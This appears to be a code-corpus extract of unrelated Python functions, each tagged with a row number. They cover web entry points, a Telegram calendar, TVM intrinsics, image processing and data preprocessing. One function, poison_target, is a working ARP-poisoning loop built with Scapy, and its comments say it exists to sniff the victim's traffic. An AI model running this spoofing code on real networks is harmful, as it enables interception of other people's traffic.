return 1 | 5,334,230 |
def index():
""" Application entry point. """
return render_template("index.html") | 5,334,231 |
def add_filepath(parent, filename, definition=''):
"""returns the path to filename under `parent`."""
if filename is None:
raise ValueError("filename cannot be None")
# FIXME implementation specifics! only works with FileSystemDatabase
parent_path = parent._repr
file_path = parent_path / filename
parent.attrs[f'{file_path.name}/{DEFINITION_KEY}'] = definition
parent.attrs[f'{file_path.name}/{TYPE_KEY}'] = FILE_TYPE
parent.attrs.commit()
return file_path | 5,334,232 |
def silhouette_to_prediction_function(
silhouette: np.ndarray
) -> Callable[[np.ndarray], bool]:
"""
Takes a silhouette and returns a function.
The returned function takes x,y point and
returns wether it is in the silhouette.
Args:
silhouette:
Returns:
"""
def prediction_function(point: np.ndarray) -> bool:
try:
return silhouette[int(point[0]), int(point[1])]
except:
return False
return prediction_function | 5,334,233 |
def create_calendar(year=None, month=None):
"""
Create an inline keyboard with the provided year and month
"""
now = datetime.datetime.now()
if year is None:
year = now.year
if month is None:
month = now.month
data_ignore = create_calendar_callback_data("IGNORE", year, month, 0)
keyboard = []
# First row - Month and Year
row = [
InlineKeyboardButton(
calendar.month_name[month] + " " + str(year), callback_data=data_ignore
)
]
keyboard.append(row)
# Second row - Week Days
row = []
for day in ["Mo", "Tu", "We", "Th", "Fr", "Sa", "Su"]:
row.append(InlineKeyboardButton(day, callback_data=data_ignore))
keyboard.append(row)
my_calendar = calendar.monthcalendar(year, month)
for week in my_calendar:
row = []
for day in week:
if day == 0:
row.append(InlineKeyboardButton(" ", callback_data=data_ignore))
else:
row.append(
InlineKeyboardButton(
str(day),
callback_data=create_calendar_callback_data(
"DAY", year, month, day
),
)
)
keyboard.append(row)
# Last row - Buttons
row = [
InlineKeyboardButton(
"<",
callback_data=create_calendar_callback_data("PREV-MONTH", year, month, day),
),
InlineKeyboardButton(" ", callback_data=data_ignore),
InlineKeyboardButton(
">",
callback_data=create_calendar_callback_data("NEXT-MONTH", year, month, day),
),
]
keyboard.append(row)
return InlineKeyboardMarkup(keyboard) | 5,334,234 |
def read_image(link, size):
""" Read image on link and convert it to given size
Usage:
image = readImage(link, size)
Input variables:
link: path to image
size: output size of image
Output variables:
image: read and resized image
"""
image = imageio.imread(link)
image = trf.resize(image, size)
return image | 5,334,235 |
def make_send_data(application_preset):
"""Generate the data to send to the protocol."""
if application_preset == 'none':
# data = bytes([i for i in range(32)])
# data = bytes([i for i in range(54)]) # for teensy 4.0
data = bytes([i for i in range(54)]) # for teensy lc & micro
data_kwargs = {}
else:
if application_preset == 'pubsub':
# (data, schema) = (tuple(i for i in range(185 - 18)), 0x60) # for due and teensy 4.0
(data, schema) = (tuple(i for i in range(50 - 24)), 0x60) # for teensy lc & micro
# (data, schema) = (tuple(i for i in range(50 - 18)), 0x60) # for uno
data = (b'echo', data)
# data = (b'copy', data)
# data = (b'reply', data)
# data = (b'ping', data)
# (data, schema) = ((b'blink', True), 0x02)
# (data, schema) = ((b'blink', False), 0x02)
# (data, schema) = ((b'prefix', ('world!', 'Hello, ')), 0x00)
elif application_preset == 'minimal':
# (data, schema) = (tuple(i for i in range(185 - 18)), 0x60) # for due and teensy 4.0
(data, schema) = (tuple(i for i in range(50 - 24)), 0x60) # for teensy lc & micro
# (data, schema) = (tuple(i for i in range(50 - 18)), 0x60) # for uno
(data, schema) = (('hello', True, None, 0.125, b'\x00\x01\x02\x03\x04') + data, 0x00)
# (data, schema) = (('hello', 123, 456, 789), 0x00)
else:
raise NotImplementedError('Unsupported protocol configuration!')
data_kwargs = {
'schema': schema,
'format': SERIALIZATION_FORMATS[('binary', 'dynamic', 'msgpack')],
'type': DATA_TYPES[('presentation', 'document')]
}
return (data, data_kwargs) | 5,334,236 |
def dp4a(x_scope="local", y_scope="local", z_scope="local", dtypes=("int8", "int8")):
"""
Int8 dot product reduced by every 4 elements using __dp4a
Parameters
----------
x_scope : str, optional
The storage scope of buffer for lhs
y_scope : str, optional
The storage scope of buffer for rhs
z_scope : str, optional
The storage scope of buffer for result
dtypes: tuple of strs, optional
The dtype of x and y
Returns
-------
intrin : TensorIntrin
The dp4a TensorIntrin that can be used in tensorizing schedule.
"""
n = 4 # dp4a requires operands packed by 4
result_dtype = "int32" if dtypes[1] == "int8" else "uint32"
x = te.placeholder((n,), name="x", dtype=dtypes[0])
y = te.placeholder((n,), name="y", dtype=dtypes[1])
k = te.reduce_axis((0, n), name="rc")
z = te.compute(
(1,), lambda i: te.sum(x[k].astype(result_dtype) * y[k].astype(result_dtype), axis=[k])
)
def _intrin_func(ins, outs):
def _instr(index):
xx, yy = ins
zz = outs[0]
zz_dtype = zz.dtype
if index == 1:
return zz.vstore(0, tvm.tir.const(0, zz_dtype))
ib = tvm.tir.ir_builder.create()
vec_x_dtype = "int8x4" if xx.dtype == "int8" else "uint8x4"
vec_y_dtype = "int8x4" if yy.dtype == "int8" else "uint8x4"
vec_x = xx.vload(0, dtype=vec_x_dtype)
vec_y = yy.vload(0, dtype=vec_y_dtype)
prev_z = 0 if index == 0 else zz.vload(0)
if is_target("rocm"):
# TODO(masahi): Here we are assuming that we are compiling for gfx10 or later
# We can refine the specification for dot product on rocm if needed later.
# We can just use "llvm.amdgcn.udot4" for u8u8u32, but it is not tested.
assert (
dtypes[0] == "int8" and dtypes[0] == "int8"
), "u8u8u32 dot product for rocm not supported yet"
new_z = tvm.tir.call_llvm_pure_intrin(
zz_dtype,
"llvm.amdgcn.sdot4",
tvm.tir.const(4, "uint32"),
tvm.tir.call_intrin("int32", "tir.reinterpret", vec_x),
tvm.tir.call_intrin("int32", "tir.reinterpret", vec_y),
prev_z,
True,
)
else:
new_z = tvm.tir.call_pure_extern(zz_dtype, "__dp4a", vec_x, vec_y, prev_z)
ib.emit(zz.vstore(0, new_z))
return ib.get()
return _instr(0), _instr(1), _instr(2) # body, reset, update
default_buffer_params = {"data_alignment": 4, "offset_factor": 1}
scopes = {x: x_scope, y: y_scope, z: z_scope}
binds = {
t: tvm.tir.decl_buffer(
t.shape, t.dtype, t.op.name, scope=scopes[t], **default_buffer_params
)
for t in [x, y, z]
}
return te.decl_tensor_intrin(
z.op, _intrin_func, binds=binds, default_buffer_params=default_buffer_params
) | 5,334,237 |
def _bytes_iterator_py2(bytes_):
"""
Returns iterator over a bytestring in Python 2.
Do not call directly, use bytes_iterator instead
"""
for b in bytes_:
yield b | 5,334,238 |
def test_and():
"""Test the and instruction."""
and_regex = Instructions["and"].regex
assert re.match(and_regex, "and $t1, $t2, $t1") is not None
assert re.match(and_regex, "and $t1, $t2") is None
assert re.match(and_regex, "and $t1, $t2, 33") is None | 5,334,239 |
def fileexists(filename):
"""Replacement method for os.stat."""
try:
f = open( filename, 'r' )
f.close()
return True
except:
pass
return False | 5,334,240 |
def debug_print(message, *args):
""" Method similar to LOGGER.log, but also replaces all TF ops/tensors with their names
e.g. debug_print('see tensors %s for %s', tensor_list, [1,2,3])
"""
if not DEBUG_LOGGING:
return
LOGGER.debug(message, *[format_ops(arg) for arg in args]) | 5,334,241 |
def test_knowledge_graph_init(graph_mutation_client, graph_mutation_responses):
"""Test knowldge graph client initialization."""
return graph_mutation_client.named_types | 5,334,242 |
def read_camera_matrix(filename):
"""
Read camera matrix from text file exported by PhotoScan
"""
with open(filename, 'r') as f:
s = f.read()
s = s.split(',')
s = [x.strip('\Matrix([[') for x in s]
s = [x.strip(']])') for x in s]
s = [x.strip('[') for x in s]
s = [x.strip(']') for x in s]
s = [x.strip('\n [') for x in s]
M = np.array([float(x) for x in s])
return M.reshape((4,4)) | 5,334,243 |
def level_18():
"""
Challenge 18: Telling the difference with deltas
URL: http://www.pythonchallenge.com/pc/return/balloons.html
Split lines from [0:53] and [56:109]
"""
deltas = open('text/lv18-delta.txt', 'r').read()
lines = deltas.splitlines()
left, right, png = [], [], ['', '', '']
# Separate the values by columns 53 and 56
for i in lines:
left.append(i[0:53])
right.append(i[56:109])
# Compare the difference between left and right
diff = list(difflib.ndiff(left, right))
for row in diff:
symbol = row[0]
# Convert each number into ascii data
for vals in row[2:].split():
byte = chr(int(vals, 16))
if symbol == '-':
png[0] += ''.join(byte)
elif symbol == '+':
png[1] += ''.join(byte)
elif symbol == ' ':
png[2] += ''.join(byte)
# Save into image png
for i in range(3):
with open('images/lv18-pic%d.png' % i, 'wb') as img:
img.write(png[i])
print "Finished writing binary to PNG in images." | 5,334,244 |
def plot_boxplots(data, hidden_states):
"""
Plot boxplots for all variables in the dataset, per state
Parameters
------
data : pandas DataFrame
Data to plot
hidden_states: iteretable
the hidden states corresponding to the timesteps
"""
column_names = data.columns
figs, axes = plt.subplots(len(column_names), figsize=(15, 15))
for j, var in enumerate(column_names):
axes[j].set_title(var)
vals = data[var]
data_to_plot = []
labels = []
for i in set(hidden_states):
mask = hidden_states == i
if (sum(mask) > 0):
labels.append(str(i))
values = np.array(vals[mask])
data_to_plot.append(values)
axes[j].boxplot(data_to_plot, sym='', labels=labels) | 5,334,245 |
def find_child_joints(model, joint_name):
""" Find all the joints parented to the given joint. """
joint_id = joint_name_to_index(model)
link_id = link_name_to_index(model)
# FIXME : Add exception to catch invalid joint names
joint = model.joints[joint_id[joint_name]]
clink = joint.child
return [
j.name for j in model.joints if j.parent == clink
] | 5,334,246 |
def main():
"""cli entrypoint"""
parser = argparse.ArgumentParser(description="Cleanup docker registry")
parser.add_argument("-i", "--image",
dest="image",
required=True,
help="Docker image to cleanup")
parser.add_argument("-v", "--verbose",
dest="verbose",
action="store_true",
help="verbose")
parser.add_argument("-n", "--dry-run",
dest="dry_run",
action="store_true",
help="Dry run")
parser.add_argument("-f", "--force",
dest="force",
action="store_true",
help="Force delete (deprecated)")
parser.add_argument("-p", "--prune",
dest="prune",
action="store_true",
help="Prune")
parser.add_argument("-u", "--untagged",
dest="untagged",
action="store_true",
help="Delete all untagged blobs for image")
args = parser.parse_args()
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(u'%(levelname)-8s [%(asctime)s] %(message)s'))
logger.addHandler(handler)
if args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# make sure not to log before logging is setup. that'll hose your logging config.
if args.force:
logger.info(
"You supplied the force switch, which is deprecated. It has no effect now, and the script defaults to doing what used to be only happen when force was true")
splitted = args.image.split(":")
if len(splitted) == 2:
image = splitted[0]
tag = splitted[1]
else:
image = args.image
tag = None
if 'REGISTRY_DATA_DIR' in os.environ:
registry_data_dir = os.environ['REGISTRY_DATA_DIR']
else:
registry_data_dir = "/opt/registry_data/docker/registry/v2"
try:
cleaner = RegistryCleaner(registry_data_dir, dry_run=args.dry_run)
if args.untagged:
cleaner.delete_untagged(image)
else:
if tag:
tag_count = cleaner.get_tag_count(image)
if tag_count == 1:
cleaner.delete_entire_repository(image)
else:
cleaner.delete_repository_tag(image, tag)
else:
cleaner.delete_entire_repository(image)
if args.prune:
cleaner.prune()
except RegistryCleanerError as error:
logger.fatal(error)
sys.exit(1) | 5,334,247 |
def stem(path: str) -> str:
"""returns the stem of a path (path without parent directory and without extension)
e.g
j.sals.fs.stem("/tmp/tmp-5383p1GOmMOOwvfi.tpl") -> 'tmp-5383p1GOmMOOwvfi'
Args:
path (str): path we want to get its stem
Returns:
str: path without parent directory and without extension
"""
return pathlib.Path(path).stem | 5,334,248 |
def fluent_text(field, schema):
"""
Accept multilingual text input in the following forms
and convert to a json string for storage:
1. a multilingual dict, eg.
{"en": "Text", "fr": "texte"}
2. a JSON encoded version of a multilingual dict, for
compatibility with old ways of loading data, eg.
'{"en": "Text", "fr": "texte"}'
3. separate fields per language (for form submissions):
fieldname-en = "Text"
fieldname-fr = "texte"
When using this validator in a ckanext-scheming schema setting
"required" to true will make all form languages required to
pass validation.
"""
# combining scheming required checks and fluent field processing
# into a single validator makes this validator more complicated,
# but should be easier for fluent users and eliminates quite a
# bit of duplication in handling the different types of input
required_langs = []
alternate_langs = {}
if field and field.get('required'):
required_langs = fluent_form_languages(field, schema=schema)
alternate_langs = fluent_alternate_languages(field, schema=schema)
def validator(key, data, errors, context):
# just in case there was an error before our validator,
# bail out here because our errors won't be useful
if errors[key]:
return
value = data[key]
# 1 or 2. dict or JSON encoded string
if value is not missing:
if isinstance(value, basestring):
try:
value = json.loads(value)
except ValueError:
errors[key].append(_('Failed to decode JSON string'))
return
except UnicodeDecodeError:
errors[key].append(_('Invalid encoding for JSON string'))
return
if not isinstance(value, dict):
errors[key].append(_('expecting JSON object'))
return
for lang, text in value.iteritems():
try:
m = re.match(BCP_47_LANGUAGE, lang)
except TypeError:
errors[key].append(_('invalid type for language code: %r')
% lang)
continue
if not m:
errors[key].append(_('invalid language code: "%s"') % lang)
continue
if not isinstance(text, basestring):
errors[key].append(_('invalid type for "%s" value') % lang)
continue
if isinstance(text, str):
try:
value[lang] = text.decode('utf-8')
except UnicodeDecodeError:
errors[key]. append(_('invalid encoding for "%s" value')
% lang)
for lang in required_langs:
if value.get(lang) or any(
value.get(l) for l in alternate_langs.get(lang, [])):
continue
errors[key].append(_('Required language "%s" missing') % lang)
if not errors[key]:
data[key] = json.dumps(value)
return
# 3. separate fields
output = {}
prefix = key[-1] + '-'
extras = data.get(key[:-1] + ('__extras',), {})
for name, text in extras.iteritems():
if not name.startswith(prefix):
continue
lang = name.split('-', 1)[1]
m = re.match(BCP_47_LANGUAGE, lang)
if not m:
errors[name] = [_('invalid language code: "%s"') % lang]
output = None
continue
if output is not None:
output[lang] = text
for lang in required_langs:
if extras.get(prefix + lang) or any(
extras.get(prefix + l) for l in alternate_langs.get(lang, [])):
continue
errors[key[:-1] + (key[-1] + '-' + lang,)] = [_('Missing value')]
output = None
if output is None:
return
for lang in output:
del extras[prefix + lang]
data[key] = json.dumps(output)
return validator | 5,334,249 |
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up Tasmota sensor dynamically through discovery."""
@callback
def async_discover(
tasmota_entity: HATasmotaEntity, discovery_hash: DiscoveryHashType
) -> None:
"""Discover and add a Tasmota sensor."""
async_add_entities(
[
TasmotaSensor(
tasmota_entity=tasmota_entity, discovery_hash=discovery_hash
)
]
)
hass.data[
DATA_REMOVE_DISCOVER_COMPONENT.format(sensor.DOMAIN)
] = async_dispatcher_connect(
hass,
TASMOTA_DISCOVERY_ENTITY_NEW.format(sensor.DOMAIN),
async_discover,
) | 5,334,250 |
def palette_color_brewer_q_Set3(reverse=False):
"""Generate set3 Brewer palette of a given size ... interpolate as needed ... best for discrete mapping
Args:
reverse: order the colors backward as compared to standard Brewer palette
Returns:
lambda: generates a list of colors
See Also:
:meth:`gen_node_color_map`, :meth:`gen_edge_color_map`
"""
return lambda value_count: _palette_color_brewer(value_count, colorbrewer.Set3, reverse) | 5,334,251 |
def process_file(path, proc_mode, series=None, subimg_offset=None,
subimg_size=None, roi_offset=None, roi_size=None):
"""Processes a single image file non-interactively.
Assumes that the image has already been set up.
Args:
path (str): Path to image from which MagellanMapper-style paths will
be generated.
proc_mode (str): Processing mode, which should be a key in
:class:`config.ProcessTypes`, case-insensitive.
series (int): Image series number; defaults to None.
subimg_offset (List[int]): Sub-image offset as (z,y,x) to load;
defaults to None.
subimg_size (List[int]): Sub-image size as (z,y,x) to load;
defaults to None.
roi_offset (List[int]): Region of interest offset as (x, y, z) to
process; defaults to None.
roi_size (List[int]): Region of interest size of region to process,
given as (x, y, z); defaults to None.
Returns:
Tuple of stats from processing, or None if no stats, and
text feedback from the processing, or None if no feedback.
"""
# PROCESS BY TYPE
stats = None
fdbk = None
filename_base = importer.filename_to_base(path, series)
proc_type = libmag.get_enum(proc_mode, config.ProcessTypes)
print("{}\n".format("-" * 80))
if proc_type is config.ProcessTypes.LOAD:
# loading completed
return None, None
elif proc_type is config.ProcessTypes.LOAD:
# already imported so does nothing
print("imported {}, will exit".format(path))
elif proc_type is config.ProcessTypes.EXPORT_ROIS:
# export ROIs; assumes that info_proc was already loaded to
# give smaller region from which smaller ROIs from the truth DB
# will be extracted
from magmap.io import export_rois
db = config.db if config.truth_db is None else config.truth_db
export_rois.export_rois(
db, config.image5d, config.channel, filename_base,
config.plot_labels[config.PlotLabels.PADDING],
config.unit_factor, config.truth_db_mode,
os.path.basename(config.filename))
elif proc_type is config.ProcessTypes.TRANSFORM:
# transpose, rescale, and/or resize whole large image
transformer.transpose_img(
path, series, plane=config.plane,
rescale=config.transform[config.Transforms.RESCALE],
target_size=config.roi_size)
elif proc_type in (
config.ProcessTypes.EXTRACT, config.ProcessTypes.ANIMATED):
# generate animated GIF or extract single plane
export_stack.stack_to_img(
config.filenames, roi_offset, roi_size, series, subimg_offset,
subimg_size, proc_type is config.ProcessTypes.ANIMATED,
config.suffix)
elif proc_type is config.ProcessTypes.EXPORT_BLOBS:
# export blobs to CSV file
from magmap.io import export_rois
export_rois.blobs_to_csv(config.blobs.blobs, filename_base)
elif proc_type in (
config.ProcessTypes.DETECT, config.ProcessTypes.DETECT_COLOC):
# detect blobs in the full image, +/- co-localization
coloc = proc_type is config.ProcessTypes.DETECT_COLOC
stats, fdbk, _ = stack_detect.detect_blobs_stack(
filename_base, subimg_offset, subimg_size, coloc)
elif proc_type is config.ProcessTypes.COLOC_MATCH:
if config.blobs is not None and config.blobs.blobs is not None:
# colocalize blobs in separate channels by matching blobs
shape = (config.image5d.shape[1:] if subimg_size is None
else subimg_size)
matches = colocalizer.StackColocalizer.colocalize_stack(
shape, config.blobs.blobs)
# insert matches into database
colocalizer.insert_matches(config.db, matches)
else:
print("No blobs loaded to colocalize, skipping")
elif proc_type in (config.ProcessTypes.EXPORT_PLANES,
config.ProcessTypes.EXPORT_PLANES_CHANNELS):
# export each plane as a separate image file
export_stack.export_planes(
config.image5d, config.savefig, config.channel,
proc_type is config.ProcessTypes.EXPORT_PLANES_CHANNELS)
elif proc_type is config.ProcessTypes.EXPORT_RAW:
# export the main image as a raw data file
out_path = libmag.combine_paths(config.filename, ".raw", sep="")
libmag.backup_file(out_path)
np_io.write_raw_file(config.image5d, out_path)
elif proc_type is config.ProcessTypes.PREPROCESS:
# pre-process a whole image and save to file
# TODO: consider chunking option for larger images
profile = config.get_roi_profile(0)
out_path = config.prefix
if not out_path:
out_path = libmag.insert_before_ext(config.filename, "_preproc")
transformer.preprocess_img(
config.image5d, profile["preprocess"], config.channel, out_path)
return stats, fdbk | 5,334,252 |
def get_loss_function(identifier):
"""
Gets the loss function from `identifier`.
:param identifier: the identifier
:type identifier: str or dict[str, str or dict]
:raise ValueError: if the function is not found
:return: the function
:rtype: function
"""
return _get(identifier, loss_functions, tensorflow.keras.losses.get,
name_only=True) | 5,334,253 |
def find_defender(ships, side):
"""Crude method to find something approximating the best target when attacking"""
enemies = [x for x in ships if x['side'] != side and x['hp'] > 0]
if not enemies:
return None
# shoot already wounded enemies first
wounded = [x for x in enemies if x['hp'] < x['size']]
if wounded:
found = ships.index(wounded[0])
return found
# shoot boarders in priority (?)
boarding = [x for x in enemies if 'Boarding' in x['name']]
if boarding:
found = ships.index(boarding[0])
return found
# shoot 1 hp ships
hp_1 = [x for x in enemies if x['size'] == 1]
if hp_1:
found = ships.index(hp_1[0])
return found
# shoot 2 hp ships
hp_2 = [x for x in enemies if x['size'] == 2]
if hp_2:
found = ships.index(hp_2[0])
return found
# otherwise just shoot the first one (??!)
found = ships.index(enemies[0])
return found | 5,334,254 |
def get_parameters(image_path):
"""
Parses the image path to dictionary
:param str image_path: image path
:rtype dict
"""
image_path = image_path
image_directory = os.path.dirname(image_path)
image_filename = os.path.basename(image_path)
image_name = image_filename.split('.')[0]
image_extension = image_filename.split('.')[-1]
return {
'directory': image_directory,
'extension': image_extension,
'name': image_name,
'filename': image_filename,
'path': image_path
} | 5,334,255 |
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
"""
对网关和目标进行投毒攻击后,我们就能嗅探到目标机器进出的流量了
:param gateway_ip:
:param gateway_mac:
:param target_ip:
:param target_mac:
:return:
"""
global poisoning
# 构建欺骗目标IP的ARP请求
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
# 构建欺骗目标网关的ARP请求
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
# 使用循环不断发送ARP请求
while poisoning:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print "[*] ARP poison attack finished."
return | 5,334,256 |
def Create_clump_summaries(feature_file,simplify_threshold):
""" Employs Panda Shapely library to simplify polygons by eliminating almost
colinear vertices. Generates two data structures: First - sort_clump_df: Panda Dataframe
containing the longest line in the simplified and unsimplified polygon, polygon area,
polygon number by order listed in feature_file. The Dataframe is sorted by
length of longest edge of simplified polygon. Second - polygon_dict which
is a dictionary with numpy arrays representing normalized polygons """
i= 0
clump_dict = {'clump':[],'area':[], 'max_line':[], 'max_line_simplify':[]}
polygon_dict ={}
with open(feature_file) as input_file2:
reader = csv.DictReader(input_file2)
for row1 in reader:
row1_polygon = row1['Polygon']
row1_polygon = row1_polygon[1:len(row1_polygon)-1]
row1_polygon_list = row1_polygon.split(':')
row1_polygon_list = [float(x) for x in row1_polygon_list]
even_pts = row1_polygon_list[0:len(row1_polygon_list)-1:2]
odd_pts = row1_polygon_list[1:len(row1_polygon_list):2]
row1_tuples = list(zip(even_pts,odd_pts))
# clump represents the polygon representing each clump
clump = Polygon(row1_tuples)
# Invoke Shapely to generate simplified polygon
clump2 = clump.simplify(simplify_threshold)
# Obtain points defining polygon, compute length of edges
npclump = np.array(clump.exterior)
npclump_shift = np.roll(npclump,1,axis=0)
diff_clump = npclump_shift - npclump
l2_clump = np.sqrt(((diff_clump**2).sum(axis=1)))
max_l2_clump = l2_clump.max()
npclump2 = np.array(clump2.exterior)
npclump2_shift = np.roll(npclump2,1,axis=0)
diff_clump2 = npclump2_shift - npclump2
l2_clump2 = np.sqrt(((diff_clump2**2).sum(axis=1)))
max_l2_clump2 = l2_clump2.max()
clump_dict['clump'].append(i)
clump_dict['max_line'].append(max_l2_clump)
clump_dict['area'].append(clump.area)
clump_dict['max_line_simplify'].append(max_l2_clump2)
# shift x and y polygon axis
polygon_dict[i] = npclump2 - npclump2.min(axis=0)
print('\n number', i, '\n area',clump.area, 'clump max line',max_l2_clump, 'simplified clump max line', max_l2_clump2)
i +=1
num_clumps = i-1
clump_df = pd.DataFrame(clump_dict)
sort_clump_df = clump_df.sort_values(by='max_line_simplify',ascending = False)
sort_clump_df.reset_index(inplace=True)
return sort_clump_df,polygon_dict, num_clumps | 5,334,257 |
def norm(point):
"""Returns the Euclidean norm of a point from origin.
Parameters
==========
point: This denotes a point in the dimensional space.
Examples
========
>>> from sympy.integrals.intpoly import norm
>>> from sympy.geometry.point import Point
>>> norm(Point(2, 7))
sqrt(53)
"""
half = S(1)/2
if isinstance(point, tuple):
return (point[0] ** 2 + point[1] ** 2) ** half
elif isinstance(point, Point):
return (point.x ** 2 + point.y ** 2) ** half
elif isinstance(point, dict):
return sum(i**2 for i in point.values()) ** half | 5,334,258 |
def read_reducing():
"""Return gas resistance for reducing gases.
Eg hydrogen, carbon monoxide
"""
setup()
return read_all().reducing | 5,334,259 |
def access_rights_to_metax(data):
"""
Cherry pick access right data from the frontend form data and make it comply with Metax schema.
Arguments:
data {object} -- The whole object sent from the frontend.
Returns:
object -- Object containing access right object that comply to Metax schema.
"""
access_rights = {}
if "license" in data:
access_rights["license"] = []
if "identifier" in data["license"] and data["license"]["identifier"] != 'other':
license_object = {}
license_object["identifier"] = data["license"]["identifier"]
access_rights["license"].append(license_object)
elif "otherLicenseUrl" in data:
license_object = {}
license_object["license"] = data["otherLicenseUrl"]
access_rights["license"].append(license_object)
if "accessType" in data:
access_rights["access_type"] = {}
access_rights["access_type"]["identifier"] = data["accessType"]["url"]
if data["accessType"]["url"] != access_type["OPEN"]:
access_rights["restriction_grounds"] = []
access_rights["restriction_grounds"].append({"identifier": data["restrictionGrounds"]})
if data["accessType"]["url"] == access_type["EMBARGO"] and "embargoDate" in data:
access_rights["available"] = data["embargoDate"]
return access_rights | 5,334,260 |
def read_toml_file(input_file, config_name = None, confpaths = [".", TCFHOME + "/" + "config"]):
"""
Function to read toml file and returns the toml content as a list
Parameters:
- input_file is any toml file which need to be read
- config_name is particular configuration to pull
- data_dir is the directory structure in which the toml file exists
"""
conffiles = [input_file]
config = pconfig.parse_configuration_files(conffiles, confpaths)
if config_name is None:
return config
else :
result = config.get(config_name)
if result is None:
logger.error("%s is missing in toml file %s", config_name, input_file )
return None
else :
return result | 5,334,261 |
def assert_images_equal(image_1: str, image_2: str):
"""
Assert wether 2 images are the same
"""
img1 = Image.open(image_1)
img2 = Image.open(image_2)
# Convert to same mode and size for comparison
img2 = img2.convert(img1.mode)
img2 = img2.resize(img1.size)
sum_sq_diff = np.sum((np.asarray(img1).astype('float') - np.asarray(img2).astype('float'))**2)
if sum_sq_diff == 0:
# Images are exactly the same
pass
#return 0
else:
normalized_sum_sq_diff = sum_sq_diff / np.sqrt(sum_sq_diff)
assert normalized_sum_sq_diff < 0.001 | 5,334,262 |
def and_sum (phrase):
"""Returns TRUE iff every element in <phrase> is TRUE"""
for x in phrase:
if not x:
return False
return True | 5,334,263 |
def history_menu(chatid, message_id=False):
"""
Вывод истории заказов
:param chatid: id пользователя, которому нужно отправить
:param message_id: если нужно отредактировать существующее сообщение, то отпредактирует его, иначе отправит новым сообщением
:return:
"""
menu = types.InlineKeyboardMarkup()
menu.add(types.InlineKeyboardButton(text="К главному меню", callback_data='to_main_menu'))
history_list = History(chatid)
history_list_message = ""
if len(history_list) != 0:
for barberName, order_time, rating in history_list:
history_list_message += "Барбер: " + str(barberName) + ", время: " + str(order_time) + ", оценка: " \
+ str(rating) + "\n"
else:
history_list_message = "У вас еще не было стрижек"
if not message_id:
send_message(chatid, history_list_message, menu)
else:
edit_message(chatid, message_id, history_list_message, menu, markdown=True) | 5,334,264 |
def load_data(filename: str):
"""
Load house prices dataset and preprocess data.g
Parameters
----------
filename: str
Path to house prices dataset
Returns
-------
Design matrix and response vector (prices) - either as a single
DataFrame or a Tuple[DataFrame, Series]
"""
house_data = pd.read_csv(filename)
# drop corrupted data
house_data.dropna(inplace=True)
house_data.drop_duplicates(inplace=True)
# remove the location and id columns
house_data.drop(columns=['lat', 'long', 'id'], inplace=True)
# remove negative and illegal values
for column in ['price', 'sqft_lot', 'sqft_lot15', 'floors', 'yr_built']:
house_data = house_data[house_data[column] > 0]
for column in [('waterfront', range(2)), ('view', range(5)),
('condition', range(1, 6)), ('grade', range(1, 14))]:
house_data = house_data[house_data[column[0]].isin(column[1])]
# categorize the columns 'zipcode', 'date', 'yr_built', 'yr_renovated'
house_data['zipcode'] = house_data['zipcode'].astype(str).str[:3]
house_data = pd.get_dummies(house_data, columns=['zipcode'],
prefix='zipcode_area')
house_data['date'] = house_data['date'].str[:4]
house_data = pd.get_dummies(house_data, columns=['date'])
house_data['yr_built'] = house_data['yr_built'].astype(str).str[:2]
house_data = pd.get_dummies(house_data, columns=['yr_built'])
house_data['yr_renovated'] = house_data['yr_renovated'].astype(str).str[:2]
house_data = pd.get_dummies(house_data, columns=['yr_renovated'])
# is_basement flag
house_data['is_basement'] = (house_data['sqft_basement'] >= 1).astype(int)
return house_data['price'], house_data.drop(columns=['price']) | 5,334,265 |
def eccanom(M, e):
"""Finds eccentric anomaly from mean anomaly and eccentricity
This method uses algorithm 2 from Vallado to find the eccentric anomaly
from mean anomaly and eccentricity.
Args:
M (float or ndarray):
mean anomaly
e (float or ndarray):
eccentricity (eccentricity may be a scalar if M is given as
an array, but otherwise must match the size of M.
Returns:
E (float or ndarray):
eccentric anomaly
"""
# make sure M and e are of the correct format.
# if 1 value provided for e, array must match size of M
M = np.array(M).astype(float)
if not M.shape:
M = np.array([M])
e = np.array(e).astype(float)
if not e.shape:
e = np.array([e] * len(M))
assert e.shape == M.shape, "Incompatible inputs."
assert np.all((e >= 0) & (e < 1)), "e defined outside [0,1)"
# initial values for E
E = M / (1 - e)
mask = e * E ** 2 > 6 * (1 - e)
E[mask] = (6 * M[mask] / e[mask]) ** (1. / 3)
# Newton-Raphson setup
tolerance = np.finfo(float).eps * 4.01
numIter = 0
maxIter = 200
err = 1.
while err > tolerance and numIter < maxIter:
E = E - (M - E + e * np.sin(E)) / (e * np.cos(E) - 1)
err = np.max(abs(M - (E - e * np.sin(E))))
numIter += 1
if numIter == maxIter:
raise Exception("eccanom failed to converge. Final error of %e" % err)
return E | 5,334,266 |
def transform_frame(frame: np.array,
transform: AffineTransformation,
rotate: bool = False,
center_crop: bool = False) -> np.array:
""" Perform affine transformation of a single image-frame.
Parameters
----------
frame : array
Image frame.
transform : AffineTransformation
Delta-x, -y, -angle to use for transformation.
rotate : bool
If True, rotation will be used otherwise only translation.
center_crop : bool
If True, the center of the image will be cropped out by a fixed margin to remove border artifacts.
Returns
-------
array
"""
dx, dy, da = transform
height, width = frame.shape[:2]
# Reconstruct transformation matrix accordingly to new values
transformation_matrix = np.zeros((2, 3), np.float32)
if rotate:
transformation_matrix[0, 0] = np.cos(da)
transformation_matrix[0, 1] = -np.sin(da)
transformation_matrix[1, 0] = np.sin(da)
transformation_matrix[1, 1] = np.cos(da)
else:
transformation_matrix[0, 0] = 1
transformation_matrix[0, 1] = 0
transformation_matrix[1, 0] = 0
transformation_matrix[1, 1] = 1
transformation_matrix[0, 2] = dx
transformation_matrix[1, 2] = dy
# Apply affine wrapping to the given frame
stabilized_frame = cv2.warpAffine(frame, transformation_matrix, (width, height), flags=cv2.INTER_NEAREST)
if center_crop:
